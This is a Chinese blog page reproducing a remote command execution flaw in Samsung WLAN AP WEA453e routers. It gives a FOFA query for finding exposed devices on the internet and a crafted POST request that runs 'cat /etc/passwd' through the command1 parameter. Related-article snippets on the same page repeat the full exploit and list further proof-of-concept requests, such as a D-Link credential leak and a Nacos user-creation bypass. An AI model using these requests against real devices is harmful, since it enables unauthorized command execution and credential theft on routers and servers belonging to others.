三星 WLAN AP WEA453e路由器 远程命令执行漏洞

最新推荐文章于 2022-09-08 14:59:22 发布
最新推荐文章于 2022-09-08 14:59:22 发布
阅读量695 收藏 2
点赞数
分类专栏: 漏洞 漏洞分析 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121095208
版权
本文介绍了三星WEA453e路由器的一个远程命令执行漏洞。路由器作为网络间的关键设备,其安全性至关重要。在漏洞复现部分,通过fofa搜索引擎定位到目标设备,并通过抓包分析,揭示了如何构造特定的请求包来触发该漏洞。
摘要由CSDN通过智能技术生成

漏洞简介

路由器是连接两个或多个网络的硬件设备,在网络间起网关的作用,是读取每一个数据包中的地址然后决定如何传送的专用智能性的网络设备。

漏洞复现

fofa
title==“Samsung WLAN AP”

在这里插入图片描述
在这里插入图片描述
对首页抓包
在这里插入图片描述
构造如下请求包

POST /(download)/tmp/a.txt HTTP/1.1
Host: x.x.x.x.
Connection: close
Content-Length: 48

command1=shell:cat /etc/passwd| dd
最低0.47元/天 解锁文章
GuiltyFet
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Samsung-WLAN-AP路由器RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
02-01 4270
简介: 三星-WLAN-AP-WEA453e 路由器存在远程命令执行。 fofa搜索: title="Samsung WLAN AP" 大多都是国外的,随便点击一个后进入网页主页面 漏洞利用: 利用burp构造特殊的请求 exp: POST /(download)/tmp/a.txt HTTP/1.1 Host: xxx.xxx.xxx.xxx command1=shell:cat /etc/passwd| dd of=/tmp/a.txt 利用工具
SPD2010(L-WEA2010) lcd 芯片手册
04-16
**SPD2010 (L-WEA2010) LCD 芯片手册概述** 本手册详细介绍了SPD2010 (L-WEA2010) LCD芯片,它是一款专为物联网(IoT)和可穿戴设备设计的454x454像素TDDI(触控与显示驱动集成)解决方案。该芯片集成了LCD显示功能和...
SamSung WLAN AP:RCE漏洞复现
Foreverlove112的博客
09-08 940
SamSung WLAN AP:RCE漏洞复现
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1380
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
2021年网络安全设备漏洞集合
weixin_47536169的博客
07-13 3764
360天擎SQL注入漏洞 描述 fofa title="360新天擎" POC & 利用 /api/dp/rptsvcsyncpoint?ccid=1 360天擎信息泄露 描述 /api/dbstat/gettablessize POC & 利用 Alibaba 阿里巴巴Nacos认证绕过 描述 fofa:title="Nacos" POC & EXP # 添加用户 POST /nacos/v1/auth/users HTTP/1.1 ..
oracle中得到一条SQL语句的执行时间的两种方式
09-10
当你执行这个命令后,每次运行的SQL语句都会在结果后面显示其执行时间。例如: ```sql SQL> SET TIMING ON; SQL> SELECT COUNT(*) FROM wea; COUNT(*) ---------- 39490 已用时间: 00: 00: 00.06 ``` 在这个例子中...
正运动ZMC004WEA运动控制器用户手册
最新发布
05-25
ZMC004WEA运动控制器是一款专为经济型多轴运动控制设计的独立式控制器,它兼容EtherCAT总线技术,同时支持脉冲型控制。这款控制器能支持4个内置轴,并通过扩展可达6轴,适用于直线插补、圆弧插补和螺旋插补等多种...
激光武器新技术及应用
02-11
高能激光武器在现代战场上具有作战费效比高、快速响应和杀伤概率高等优点.介绍了几种最新的激光武器新技术以及应用,讨论了激光武器的特点及前景.
wea-manca-bot
03-10
【标题】"wea-manca-bot" 是一个基于JavaScript编程语言构建的自动化工具,主要针对Termux环境设计。Termux是一款Android终端模拟器和Linux环境应用程序,它允许用户在安卓设备上运行各种Linux命令行工具,包括编程...
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8496
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞漏洞复现 fofa语法
各个漏洞文库
weixin_51387754的博客
06-19 6822
漏洞文档总结: 佩奇文库 Qingy 风炫漏洞库 白阁文库 Morker文库 狼组知识库 零组文库 PwnWiki
Log4j2 RCE漏洞及靶场搭建
weixin_51387754的博客
12-11 6161
漏洞简介 Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。 目前受影响的Apache Log4j2版本: 2.0 ≤ Apache Log4j <= 2.14.1 漏洞复现 在下载镜像复现之前确保,虚拟机非处于挂起状态! 在下载
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
weixin_51387754的博客
12-30 4866
漏洞简介 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 模块:thinkphp 所有的主入口文件默认访问index控制器   方法:thinkphp 所有的控制器默认执行index动作   构造:http://IP/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值…] 原理:控制了i
CVE-2021-31166 HTTP协议栈远程代码执行漏洞(详解图文教程)
weixin_51387754的博客
05-21 4416
漏洞名称 : HTTP协议栈远程代码执行漏洞CVE-2021-31166 组件名称 : HTTP.sys 影响范围 : Windows 10 Version 2004, 20H2 Windows Server version 2004, 20H2 漏洞类型 : 远程代码执行 利用条件 : 1、用户认证:否 2、前置条件:受害主机启用了HTTP服务 3、触发方式:远程 综合评价 : <综合评定利用难度>:困难,在无需授权的情况下可以导致远程服务器拒绝服务,但是要实现代码执行
iis短文件名漏洞
weixin_51387754的博客
12-22 3775
漏洞简述 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。 漏洞复现 构造payload查看是否具有漏洞 http://www.target.com/~1***/a.aspx http://www.target.com/l1j1e*~1****/a.aspx 如果存在短文件名泄露漏洞就会出现404页面
ms17-010(永恒之蓝)搭建、攻击、打补丁
weixin_51387754的博客
05-31 3508
前言 写文目的:被问到ms17_010(永恒之蓝漏洞怎么修补)? 那么作为网络安全的工作者,胜负欲于是就来了 WIN7虚拟机搭建 我所使用的虚拟机 ed2k://|file|cn_windows_7_ultimate_x64_dvd_x15-66043.iso|3341268992|7DD7FA757CE6D2DB78B6901F81A6907A|/ KALI虚拟机搭建 我所使用的虚拟机 以上两种可在官网自行下载,也可自行复制链接到迅雷进行下载 攻击过程 kali 192.168.80.129 win71
CVE-2018-18778 mini_httpd任意文件读取
weixin_51387754的博客
12-03 3247
漏洞简介 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。 (void) snprintf( vfile, sizeof(vfile),
CVE-2018-7490 uWSGI PHP目录穿越漏洞
weixin_51387754的博客
01-17 3210
漏洞简介 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。 uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。 漏洞复现 运行存在漏洞的uWSGI服务器: docker-compose up -d 运行完成后,访问http://your-ip:8080/即可看到phpinfo信息,说明uwsgi-php服务器已
资产灯塔系统弱口令
weixin_51387754的博客
08-17 3192
fofa语法:title=“资产灯塔系统” 首先 漏洞POC 账号密码为:admin/arlpass 接下来我们进行批量扫描漏洞 先用bgbingfofa把查询结果保存在result.txt 右击以root新建一个test文档,把下列代码放进去 import requests import sys import argparse import urllib3 import re urllib3.disable_warnings() def banner(): print('+------
CVE-2015-5531 Elasticsearch 目录遍历漏洞
weixin_51387754的博客
11-18 3036
漏洞简介 漏洞类型:路径遍历 漏洞影响版本:1.0.0 – 1.6.0 攻击路径:远程 漏洞产生原因:源于程序没有充分过滤用户提交的输入,远程攻击者可借助目录遍历字符‘…’利用该漏洞访问包含敏感信息的任意文件。 先说说elasticsearch 的备份与快照功能 漏洞利用需要涉及到elasticsearch的备份功能,elasticsearch 提供了一套强大的API,使得elasticsearch备份非常简单 要实现备份功能。前提是elasticsearch 进程对备份目录有写入权限,一般来说我们可以利用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值